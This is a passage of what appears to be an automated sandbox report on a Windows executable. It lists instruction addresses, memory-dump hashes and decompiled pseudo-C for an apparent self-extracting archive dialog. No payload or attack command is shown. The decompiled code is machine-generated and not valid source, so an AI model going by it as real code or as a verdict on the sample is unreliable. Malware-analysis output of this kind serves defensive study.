                0x00ca88bf
                0x00ca88c5
                0x00ca88ca
                0x00ca88d0
                0x00ca88d7
                0x00ca88dc
                0x00ca88dd
                0x00ca88df
                0x00ca8972
                0x00ca8974
                0x00ca8979
                0x00ca897b
                0x00ca89cd
                0x00ca89d0
                0x00ca89d2
                0x00ca89f6
                0x00ca89f9
                0x00ca89f9
                0x00ca8a00
                0x00ca8a38
                0x00ca8a3a
                0x00ca8ff7
                0x00ca8ff7
                0x00ca8ffb
                0x00ca9001
                0x00ca9006
                0x00ca900a
                0x00ca900d
                0x00ca9010
                0x00ca9012
                0x00ca9012
                0x00ca9012
                0x00ca9012
                0x00ca9018
                0x00ca9018
                0x00ca901c
                0x00000000
                0x00000000
                0x00ca901e
                0x00ca9020
                0x00ca84a0
                0x00ca84a0
                0x00000000
                0x00ca84a0
                0x00ca9026
                0x00ca902c
                0x00ca903a
                0x00ca903c
                0x00000000
                0x00000000
                0x00000000
                0x00ca903c
                0x00ca902e
                0x00ca9030
                0x00000000
                0x00ca9030
                0x00ca8a40
                0x00ca8a40
                0x00ca8a43
                0x00ca8a4a
                0x00ca8a5c
                0x00ca8a5c
                0x00ca8a5f
                0x00ca8a61
                0x00ca8aa8
                0x00ca8aa8
                0x00ca8aac
                0x00ca8aae
                0x00ca8ab6
                0x00ca8ab6
                0x00ca8aca
                0x00ca8ad0
                0x00ca8ad6
                0x00ca8adc
                0x00ca8aed
                0x00ca8b03
                0x00ca8b0e
                0x00ca8b17
                0x00ca8b1a
                0x00ca8b21
                0x00ca8b27
                0x00ca8b2c
                0x00ca8b2f
                0x00ca8b31
                0x00ca8b34
                0x00ca8b37
                0x00ca8b3a
                0x00ca8b3d
                0x00ca8b40
                0x00ca8b42
                0x00ca8be5
                0x00ca8be5
                0x00ca8be8
                0x00ca8bef
                0x00ca8bf6
                0x00ca8bfa
                0x00ca8c10
                0x00ca8c12
                0x00ca8c12
                0x00ca8c13
                0x00ca8c13
                0x00ca8c17
                0x00ca8c1a
                0x00ca8c1d
                0x00ca8c20
                0x00ca8d2c
                0x00ca8d33
                0x00ca8d35
                0x00ca8d3c
                0x00ca8d66
                0x00ca8d6b
                0x00ca8d7d
                0x00ca8d83
                0x00ca8d85
                0x00ca8d8b
                0x00ca8da5
                0x00ca8d3e
                0x00ca8d3e
                0x00ca8d44
                0x00ca8d4a
                0x00ca8d4b
                0x00ca8d4b
                0x00ca8d3c
                0x00ca8daa
                0x00ca8dac
                0x00ca8db1
                0x00ca8db8
                0x00ca8dea
                0x00ca8dea
                0x00ca8dea
                0x00ca8dec
                0x00ca8dee
                0x00ca8dee
                0x00ca8df5
                0x00ca8dff
                0x00ca8e06
                0x00ca8e25
                0x00ca8e25
                0x00ca8e29
                0x00ca8e2c
                0x00ca8e8d
                0x00ca8e8d
                0x00ca8e91
                0x00ca8e94
                0x00ca8ea7
                0x00ca8ea7
                0x00ca8ea7
                0x00ca8ea9
                0x00ca8ea9
                0x00ca8ead
                0x00000000
                0x00000000
                0x00ca8eb3
                0x00ca8eb6
                0x00ca8eba
                0x00ca8ec6
                0x00ca8ec6
                0x00ca8eca
                0x00ca8ee5
                0x00ca8ee5
                0x00ca8ee7
                0x00ca8efc
                0x00ca8efc
                0x00ca8efe
                0x00ca8fc2
                0x00ca8fc2
                0x00ca8fc5
                0x00ca8fcc
                0x00ca8fd4
                0x00ca8fdb
                0x00ca8fe0
                0x00ca8fe2
                0x00ca8feb
                0x00ca8feb
                0x00ca8fe2
                0x00ca8ff0
                0x00000000
                0x00ca8ff0
                0x00ca8f04
                0x00ca8f09
                0x00ca8f0b
                0x00ca8f0e
                0x00ca8f14
                0x00ca8f14
                0x00ca8f16
                0x00ca8f28
                0x00ca8f28
                0x00ca8f2e
                0x00ca8f33
                0x00ca8f3c
                0x00ca8f50
                0x00ca8f57
                0x00ca8f6a
                0x00ca8f6c
                0x00ca8f75
                0x00ca8f7a
                0x00ca8f80
                0x00ca8f8f
                0x00ca8fa2
                0x00ca8fb5
                0x00ca8fb7
                0x00ca8fba
                0x00ca8fbf
                0x00000000
                0x00ca8fbf
                0x00ca8f18
                0x00ca8f1e
                0x00000000
                0x00000000
                0x00ca8f20
                0x00ca8f26
                0x00000000
                0x00000000
                0x00000000
                0x00ca8f26
                0x00ca8f10
                0x00ca8f12
                0x00000000
                0x00000000
                0x00000000
                0x00ca8f12
                0x00ca8ee9
                0x00ca8eec
                0x00ca8ef3
                0x00000000
                0x00000000
                0x00ca8ef9
                0x00000000
                0x00ca8ef9
                0x00ca8ecc
                0x00ca8ece
                0x00000000
                0x00000000
                0x00ca8ed0
                0x00ca8ed7
                0x00000000
                0x00000000
                0x00ca8edd
                0x00ca8edf
                0x00000000
                0x00000000
                0x00000000
                0x00ca8edf
                0x00ca8ebc
                0x00ca8ec0
                0x00000000
                0x00000000
                0x00000000
                0x00ca8ec0
                0x00ca8e96
                0x00ca8e9d
                0x00000000
                0x00000000
                0x00ca8e9f
                0x00ca8ea1
                0x00000000
                0x00000000
                0x00ca8ea3
                0x00000000
                0x00ca8ea3
                0x00ca8e2e
                0x00ca8e32
                0x00000000
                0x00000000
                0x00ca8e34
                0x00ca8e36
                0x00000000
                0x00000000
                0x00ca8e38
                0x00ca8e3e
                0x00ca8e68
                0x00ca8e68
                0x00ca8e72
                0x00ca8e73
                0x00ca8e75
                0x00ca8e75
                0x00ca8e81
                0x00ca8e85
                0x00ca8e8a
                0x00000000
                0x00ca8e8a
                0x00ca8e40
                0x00ca8e46
                0x00ca8e50
                0x00ca8e50
                0x00ca8e57
                0x00000000
                0x00000000
                0x00ca8e59
                0x00ca8e63
                0x00ca8e64
                0x00000000
                0x00ca8e64
                0x00ca8e48
                0x00ca8e4e
                0x00000000
                0x00000000
                0x00000000
                0x00ca8e4e
                0x00ca8e08
                0x00ca8e0e
                0x00000000
                0x00000000
                0x00ca8e10
                0x00ca8e1a
                0x00ca8e1a
                0x00ca8e1c
                0x00ca8e1e
                0x00ca8e1e
                0x00000000
                0x00ca8e1c
                0x00ca8e12
                0x00ca8e18
                0x00000000
                0x00000000
                0x00000000
                0x00ca8e18
                0x00ca8df7
                0x00000000
                0x00ca8df7
                0x00ca8dcf
                0x00ca8ddb
                0x00ca8de0
                0x00ca8de2
                0x00000000
                0x00000000
                0x00ca8de4
                0x00ca8de6
                0x00000000
                0x00ca8de6
                0x00ca8c26
                0x00ca8c2c
                0x00ca8c2f
                0x00ca8c98
                0x00ca8c9d
                0x00ca8cae
                0x00ca8cb3
                0x00ca8cb6
                0x00ca8cb8
                0x00ca8d05
                0x00ca8d05
                0x00ca8d08
                0x00ca8d08
                0x00ca8d0f
                0x00ca8c64
                0x00ca8c64
                0x00ca8c66
                0x00ca8d22
                0x00ca8d22
                0x00ca8d22
                0x00ca8d24
                0x00ca8d24
                0x00000000
                0x00ca8d24
                0x00ca8c6c
                0x00ca8c6c
                0x00ca8c6e
                0x00000000
                0x00000000
                0x00ca8c76
                0x00000000
                0x00ca8c76
                0x00ca8d15
                0x00ca8d17
                0x00000000
                0x00000000
                0x00ca8c60
                0x00ca8c60
                0x00000000
                0x00ca8c60
                0x00ca8cba
                0x00ca8cc2
                0x00000000
                0x00000000
                0x00ca8cc4
                0x00ca8cca
                0x00ca8cd6
                0x00ca8cd7
                0x00ca8cda
                0x00ca8ce8
                0x00ca8ce9
                0x00ca8cf0
                0x00ca8cdc
                0x00ca8cdc
                0x00ca8cdc
                0x00ca8cf5
                0x00ca8cf5
                0x00ca8cf8
                0x00ca8cfa
                0x00ca8c5d
                0x00ca8c5d
                0x00000000
                0x00ca8c5d
                0x00ca8d00
                0x00000000
                0x00ca8d00
                0x00ca8c31
                0x00ca8c34
                0x00000000
                0x00000000
                0x00ca8c36
                0x00ca8c38
                0x00ca8c7c
                0x00ca8c7c
                0x00ca8c7e
                0x00000000
                0x00000000
                0x00ca8c8a
                0x00ca8c91
                0x00000000
                0x00ca8c91
                0x00ca8c3a
                0x00ca8c3d
                0x00000000
                0x00000000
                0x00ca8c3f
                0x00ca8c42
                0x00000000
                0x00000000
                0x00ca8c51
                0x00ca8c56
                0x00ca8c58
                0x00ca8c5a
                0x00000000
                0x00ca8c5a
                0x00ca8bfc
                0x00ca8bfe
                0x00000000
                0x00000000
                0x00ca8c02
                0x00ca8c03
                0x00ca8c07
                0x00000000
                0x00000000
                0x00ca8c0b
                0x00ca8c0c
                0x00000000
                0x00ca8c0c
                0x00ca8b48
                0x00ca8b4e
                0x00000000
                0x00000000
                0x00ca8b54
                0x00ca8b5a
                0x00ca8b60
                0x00ca8b62
                0x00ca8be2
                0x00ca8be2
                0x00000000
                0x00ca8be2
                0x00ca8b64
                0x00ca8b6e
                0x00ca8b6e
                0x00ca8b7e
                0x00ca8b81
                0x00ca8b83
                0x00ca8bdd
                0x00ca8bdd
                0x00ca8be0
                0x00ca8be0
                0x00000000
                0x00ca8be0
                0x00ca8b85
                0x00ca8b8b
                0x00ca8b8d
                0x00ca8b8f
                0x00ca8bb4
                0x00ca8bba
                0x00ca8bc6
                0x00ca8bd1
                0x00ca8bda
                0x00000000
                0x00ca8bda
                0x00ca8b91
                0x00ca8b9b
                0x00ca8b9d
                0x00ca8ba2
                0x00ca8ba8
                0x00000000
                0x00000000
                0x00ca8baa
                0x00000000
                0x00000000
                0x00ca8bac
                0x00ca8bb2
                0x00000000
                0x00000000
                0x00000000
                0x00ca8bb2
                0x00ca8b93
                0x00ca8b99
                0x00000000
                0x00000000
                0x00000000
                0x00ca8b99
                0x00ca8b87
                0x00ca8b89
                0x00000000
                0x00000000
                0x00000000
                0x00ca8b89
                0x00ca8b66
                0x00ca8b6c
                0x00000000
                0x00000000
                0x00000000
                0x00ca8b6c
                0x00ca8ab0
                0x00ca8ab0
                0x00ca8ab0
                0x00ca8ab0
                0x00000000
                0x00ca8ab0
                0x00ca8a67
                0x00ca8a6a
                0x00ca8a6b
                0x00ca8a6e
                0x00ca8a70
                0x00ca8a7b
                0x00ca8a7d
                0x00ca8a8c
                0x00ca8a9e
                0x00ca8a9e
                0x00ca8a7d
                0x00000000
                0x00ca8a6e
                0x00ca8a4c
                0x00ca8a53
                0x00ca8a5a
                0x00ca8aa5
                0x00000000
                0x00ca8aa5
                0x00000000
                0x00ca8a5a
                0x00ca8a06
                0x00ca8a09
                0x00ca8a10
                0x00ca8a17
                0x00ca8a1c
                0x00ca8a1e
                0x00000000
                0x00000000
                0x00ca8a20
                0x00ca8a22
                0x00ca8a25
                0x00ca8a25
                0x00ca8a2b
                0x00ca8a30
                0x00000000
                0x00ca8a30
                0x00ca89d4
                0x00ca89dd
                0x00ca89de
                0x00ca89e3
                0x00ca89e6
                0x00ca89e8
                0x00ca89f0
                0x00ca89f0
                0x00ca89f2
                0x00000000
                0x00000000
                0x00000000
                0x00ca89f4
                0x00ca897d
                0x00ca8981
                0x00ca8987
                0x00ca898a
                0x00ca898e
                0x00ca8996
                0x00ca8997
                0x00ca899a
                0x00ca89a2
                0x00ca89a3
                0x00ca89a6
                0x00ca89a8
                0x00ca89ae
                0x00ca89b4
                0x00ca89b6
                0x00ca89bc
                0x00ca89c3
                0x00ca89c6
                0x00ca89c6
                0x00ca89b4
                0x00ca89a6
                0x00ca899a
                0x00ca898e
                0x00000000
                0x00ca8981
                0x00ca88e5
                0x00ca88e8
                0x00000000
                0x00000000
                0x00ca88ee
                0x00ca88f1
                0x00ca88f4
                0x00ca88f6
                0x00000000
                0x00000000
                0x00ca88fc
                0x00ca88ff
                0x00000000
                0x00000000
                0x00ca8905
                0x00ca8908
                0x00ca890f
                0x00000000
                0x00000000
                0x00ca8917
                0x00ca8921
                0x00ca8926
                0x00ca8928
                0x00ca895f
                0x00ca895f
                0x00ca8963
                0x00ca89ed
                0x00000000
                0x00ca89ed
                0x00ca8969
                0x00ca896b
                0x00ca896d
                0x00000000
                0x00ca896d
                0x00ca892a
                0x00ca892e
                0x00000000
                0x00000000
                0x00ca8930
                0x00ca8938
                0x00ca8939
                0x00ca8940
                0x00ca895a
                0x00000000
                0x00ca895a
                0x00ca8820
                0x00ca8827
                0x00000000
                0x00000000
                0x00ca882f
                0x00ca883a
                0x00ca883f
                0x00ca8842
                0x00ca8844
                0x00000000
                0x00000000
                0x00ca8846
                0x00ca884d
                0x00000000
                0x00000000
                0x00ca884f
                0x00ca8856
                0x00ca8860
                0x00ca8861
                0x00ca8898
                0x00ca889a
                0x00ca88a6
                0x00ca88ab
                0x00ca88ad
                0x00000000
                0x00ca88ad
                0x00ca8863
                0x00ca8865
                0x00ca8873
                0x00ca8878
                0x00ca887c
                0x00ca8882
                0x00ca8882
                0x00ca8793
                0x00ca8778
                0x00ca877f
                0x00ca8784
                0x00ca878b
                0x00000000
                0x00ca878b
                0x00ca871d
                0x00ca8723
                0x00ca8728
                0x00ca872a
                0x00000000
                0x00000000
                0x00ca872c
                0x00ca8733
                0x00ca8745
                0x00ca8747
                0x00000000
                0x00ca8747
                0x00ca8736
                0x00ca873c
                0x00ca8741
                0x00ca8743
                0x00000000
                0x00000000
                0x00000000
                0x00ca8743
                0x00ca86ec
                0x00ca86ef
                0x00000000
                0x00000000
                0x00000000
                0x00ca86ef
                0x00ca86de
                0x00ca86e5
                0x00000000
                0x00000000
                0x00000000
                0x00ca86e5
                0x00ca86ae
                0x00ca86b5
                0x00000000
                0x00000000
                0x00ca86b7
                0x00ca86bb
                0x00ca86c1
                0x00000000
                0x00000000
                0x00000000
                0x00ca86c1
                0x00ca865f
                0x00ca8662
                0x00ca8664
                0x00000000
                0x00000000
                0x00000000
                0x00ca8664
                0x00ca8636
                0x00ca863c
                0x00ca863f
                0x00ca8642
                0x00ca8644
                0x00000000
                0x00ca864a
                0x00ca864a
                0x00ca864a
                0x00000000
                0x00ca864a
                0x00ca8644
                0x00ca8508
                0x00ca850e
                0x00000000
                0x00000000
                0x00ca8510
                0x00ca8517
                0x00000000
                0x00000000
                0x00000000
                0x00ca8517
                0x00ca84e1
                0x00ca84eb
                0x00ca84eb
                0x00ca84f1
                0x00000000
                0x00ca84f1
                0x00ca84e3
                0x00ca84e9
                0x00000000
                0x00000000
                0x00000000
                0x00ca84e9
                0x00ca84c3
                0x00ca84cd
                0x00ca84cd
                0x00ca84d3
                0x00000000
                0x00ca84d3
                0x00ca84c5
                0x00ca84cb
                0x00000000
                0x00000000
                0x00000000
                0x00ca84cb
                0x00ca842c
                0x00ca842f
                0x00ca844e
                0x00ca844e
                0x00ca8451
                0x00000000
                0x00000000
                0x00ca8457
                0x00ca845e
                0x00000000
                0x00000000
                0x00ca8469
                0x00ca846a
                0x00ca846e
                0x00ca846f
                0x00ca8470
                0x00ca8475
                0x00ca8477
                0x00ca848c
                0x00ca849d
                0x00000000
                0x00ca8479
                0x00ca8480
                0x00000000
                0x00ca8480
                0x00ca8477
                0x00ca8431
                0x00ca8438
                0x00000000
                0x00ca843e
                0x00ca8449
                0x00000000
                0x00ca8449
                0x00ca8438
                0x00ca83f5
                0x00ca8413
                0x00ca8413
                0x00000000
                0x00ca8413
                0x00ca83f7
                0x00ca83f8
                0x00ca83fc
                0x00ca83fd
                0x00ca8405
                0x00ca841a
                0x00ca841a
                0x00000000
                0x00ca8407
                0x00ca840e
                0x00000000
                0x00ca840e

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: 67858c5f540c9df9d4555b529c2f43951e3c336fba911f764d3508c6446c79bf
                • Instruction ID: 7cfed118cf947733c3ef64f94599a442b5eb546e50900f088cfa218293e1464c
                • Opcode Fuzzy Hash: 67858c5f540c9df9d4555b529c2f43951e3c336fba911f764d3508c6446c79bf
                • Instruction Fuzzy Hash: FF82E971904187AFDF15DF64C885BFABBA9AF07308F0841B9E8599B142DB315F88DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBE643, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBE643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00CBE64F); // executed
				return _t1;
			}




                0x00cbe648
                0x00cbe64e

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,00CBE084), ref: 00CBE648
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: e2fac75df3f9d664e48721524ddd949b058c2b3d095f3a7e8e073eb45ed91326
                • Instruction ID: 06d85e6211bfab66bbe3564b06978b481c27b7c23d275c0894c631dc1bc21509
                • Opcode Fuzzy Hash: e2fac75df3f9d664e48721524ddd949b058c2b3d095f3a7e8e073eb45ed91326
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB626D, Relevance: .3, Instructions: 325COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 01ad2df191a77ce43c5f6b3331ec658675693cac34313b97361a76ba6f831008
                • Instruction ID: 9c3786ce1cd0d9e056a5a9c30f8ae19de5d6717c4a86214ce78df0c414e76c1d
                • Opcode Fuzzy Hash: 01ad2df191a77ce43c5f6b3331ec658675693cac34313b97361a76ba6f831008
                • Instruction Fuzzy Hash: 13D127B1A043458FDB14CF28C8817DBBBE4BF94308F08056DE8959B642D738EE58CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBA5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00CBA5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E00CBD870(E00CD14F6, _t321);
				E00CBD940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E00CA12D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E00CBC343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0xceb704;
						_t277 = 1;
						 *0xce75d8 = _t302;
						 *0xce75c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xcf5d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00CB95F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0xce9602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0xce9602;
						if( *0xce9602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E00CB9A32(_t308); // executed
						_push(0xce75e4);
						_push(0xce75e0);
						_push(0xcfce18);
						_push(_t302);
						 *0xce75d6 = 0; // executed
						_t114 = E00CB9EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xce75d1 = _t277;
						}
						__eflags =  *0xce75e4;
						if( *0xce75e4 > 0) {
							_push(7);
							_push( *0xce75e0);
							_push(_t302);
							E00CBB4C7(_t299);
						}
						__eflags =  *0xcfde20;
						if( *0xcfde20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E00CADA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E00CADA42(_t286, 0xbe));
						}
						__eflags =  *0xce75e4;
						if( *0xce75e4 <= 0) {
							L103:
							__eflags =  *0xce75d6;
							if( *0xce75d6 != 0) {
								L114:
								__eflags =  *0xce95fc - 2;
								if( *0xce95fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0xce85f8;
								if( *0xce85f8 != 0) {
									E00CA1294(_t302, 0x67, 0);
									E00CA1294(_t302, 0x66, 0);
								}
								_t115 =  *0xce95fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xce75d7;
									if( *0xce75d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0xcddf38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xce75d1;
								if( *0xce75d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E00CADA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xcfce0c;
							if( *0xcfce0c != 0) {
								goto L114;
							}
							__eflags =  *0xce95fc;
							if( *0xce95fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E00CAFA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E00CAFA89(__eflags, _t321 - 0x9688, E00CADA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0xcfde20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xcfde20;
								if( *0xcfde20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0xce75e8; // 0x0
							E00CB8FE6(_t286, __eflags,  *0xce0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0xce75e0);
							_push(_t302); // executed
							E00CBB4C7(_t299); // executed
							_t133 =  *0xcfce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xce95fc;
								if(__eflags == 0) {
									_t288 =  *0xce75e8; // 0x0
									E00CB8FE6(_t288, __eflags,  *0xce0064,  *(_t321 + 0x14), _t133, 0, 0);
									L00CC2B4E( *0xcfce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0xce95fc - _t277;
							if( *0xce95fc == _t277) {
								L102:
								_push(_t277);
								_push( *0xce75e0);
								_push(_t302);
								E00CBB4C7(_t299);
								goto L103;
							} else {
								 *0xcddf3c(_t302);
								__eflags =  *0xce95fc - _t277;
								if( *0xce95fc == _t277) {
									goto L102;
								}
								__eflags =  *0xce9601;
								if( *0xce9601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xce75e0);
								_push(_t302);
								E00CBB4C7(_t299);
								__eflags =  *0xcfde18;
								if( *0xcfde18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xce0064, L"LICENSEDLG", 0, E00CBA3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xce75d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xce75d0;
						if( *0xce75d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0xce75d0;
							if( *0xce75d0 == 0) {
								__eflags =  *0xce75d1;
								if( *0xce75d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0xce75cc;
									_t279 = _t152;
									if( *0xce75cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0xcd22e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0xce85f8;
									if( *0xce85f8 == 0) {
										E00CAFAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E00CBC10F(_t285, _t321 - 0x1164, _t312);
										E00CA3E41(_t321 - 0x4288, 0x880, E00CADA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E00CADA42(_t285, 0xba);
									}
									E00CBC190(0, _t163);
									__eflags =  *0xce9601;
									if( *0xce9601 == 0) {
										E00CBC7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E00CA9D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E00CB9A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0xce9601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0xce75dc = _t277;
													E00CA12B2(_t302, 0x67, 0);
													E00CA12B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E00CADA42(_t285, 0xe6)); // executed
													E00CA12B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0xcd22e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xce75e0);
													_push(_t302);
													E00CBB4C7(_t300);
													_push(2);
													_push( *0xce75e0);
													_push(_t302);
													E00CBB4C7(_t300);
													_push(0xcfce18);
													_push(_t302);
													 *0xcffe3c = _t277; // executed
													E00CBC6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0xce75e0);
													 *0xcffe3c = 0;
													_push(_t302);
													E00CBB4C7(_t300);
													__eflags =  *0xce75d7;
													if( *0xce75d7 == 0) {
														__eflags =  *0xce75cc;
														if( *0xce75cc == 0) {
															__eflags =  *0xcfde2c;
															if( *0xcfde2c == 0) {
																_push(4);
																_push( *0xce75e0);
																_push(_t302);
																E00CBB4C7(_t300);
															}
														}
													}
													E00CA1294(_t302, _t277, _t277);
													 *0xce75dc =  *0xce75dc & 0x00000000;
													__eflags =  *0xce75dc;
													_t182 =  *0xce75d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
